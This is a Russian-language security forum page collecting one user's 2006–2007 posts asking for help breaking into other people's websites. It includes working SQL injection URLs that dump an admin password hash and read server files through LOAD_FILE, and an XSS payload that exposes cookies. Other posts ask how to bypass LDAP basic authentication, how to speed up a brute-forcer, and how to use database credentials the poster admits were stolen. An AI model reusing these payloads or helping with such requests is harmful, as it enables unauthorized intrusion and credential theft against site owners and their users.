Security Lab



Поиск  Пользователи  Правила 
Закрыть
Логин:
Пароль:
Забыли свой пароль?
Войти  
Форум » Пользователи » Арсений Реутов
Выбрать дату в календареВыбрать дату в календаре

Страницы: 1
LDAP Server
 
#
14.08.2007 15:50:07
На сайте есть папка /restricted/, защищенная basic-авторизацией. Просмотрев .htaccess, получил следующее:
Цитата

AuthName "LDAP Login"
AuthType basic
LDAP_Server 127.0.0.1
LDAP_Port 389
Base_DN dc=***,dc=***
Bind_DN "cn=proxyuser,dc=***,dc=***"
Bind_Pass "тут_пароль_в_plain_тексте"
UID_Attr uid
Group_Attr "memberUid"
#require group cn=Staff,ou=Group cn=Faculty,ou=Group
require valid-user
#LDAP_Debug On
Вопрос: каким способом можно успешно авторизироваться и что за LDAP Server такой?
 
Перейти    
Необычная уязвимость, подгрузка произвольных картинок
 
#
27.01.2007 19:44:35
Нашел PHP-скрипт на сайте, реализующий показ изображений. Уязвимость заключается в том, что я могу подключать произвольные картинки. Например:
www.site.ru/image.php?image=http://mysite.ru/bb.jpg
Проблема в том, что я не знаю как правильно это использовать...хотя кое-что уже получилось, а именно XSS
www.site.ru/image.php?image=http://mysite.ru/bb.jpg'><script>alert(document.cookie)</script>
Я слышал, что можно внедрять произвольный код в поле EXIF jpg-картинок, если у кого есть инфа по этому поводу, то пожалуйста поделитесь!
 
Перейти    
/var/db/locate.database, Как его прочитать с помощью SQL inj?
 
#
15.12.2006 21:16:40
Присутствует SQL инъекция, могу читать произвольные файлы на сервере с помощью LOAD_FILE, хочу получить файл locate.database, в котором хранится структура файлов, однако у меня возникает проблема: при запросе http://www.host.ru/script.php?id=-1 UNION SELECT 1,2,3,4,5,6,7,LOAD_FILE('/var/db/locate.database')/* получаю абсолютно нечитабельное содержание этого файла. По первым строкам можно понять, что это gzip-архив: gz.g.33..h.pt.e.ins.erstr.entef.rele1.. При попытке сохранения как файл locate.tar.gz, получившийся архив не читается. Что делать?
 
Перейти    
Многопоточность в PHP
 
#
28.11.2006 11:13:29
Пишу брутер, озадачился вопросом: как бы мне повысить его скорость с помощью многпоточности? Дело в том, что на PHP это не так то просто сделать... Насколько я понял достичь этого можно при помощи установления нескольких одновременных соединений. Но как?
 
Перейти    
MySQL и кодировки, Народ, как можно избежать ошибок с кодировками
 
#
31.07.2006 16:16:40
Пытался получить системную инфу с помощью запроса:
http://www.site.com/news.php?ID=9999+union+select+null,DATABASE(),null,null,null,null/*
Но получил такое сообщение:
News Query Failed: Illegal mix of collations (latin1_swedish_ci,IMPLICIT) and (utf8_general_ci,SYSCONST) for operation 'UNION'
Насколько я понял тут проблема с кодировками. Подскажите мне как можно успешно провести мой запрос?
 
Перейти    
SQL Injection, Помогите, плиzzz!
 
#
29.07.2006 18:21:35
История такая: нашел сайт с бажным скриптом, который обращается к БД и выводит топик:
http://www.site.com/topic.php?ID=44
После подстановки кавычки получил ошибку, затем успешно провел UNION:
http://www.site.com/topic.php?ID=44+UNION+SELECT+0,0,0,0,password,0+FROM+users+LIMIT+1,1/*
Получил хеш админа. Вопрос вот в чем: как бы мне сразу все хеши из таблицы получить?
 
Перейти    
Люди, помогите найти бесплатный шел!
 
#
18.03.2006 20:08:16
Мне нужен бесплатный шел с 10 Мб памяти, чтобы поддерживал перл, короче чтоб на нем запускался framework. Кто знает подскажите адрес, плиз!!!
 
Перейти    
Помогите с подключением к удаленной SQL - базе!!!!!
 
#
13.03.2006 21:59:03
Украл данные для подключения к чужой SQL базе. Использую RST MySQL, но ничего не выходит. Пишет типа невозможно установить соединение с MySQL сервером. Украденнык данные  кажется верны.
 
Перейти    
Страницы: 1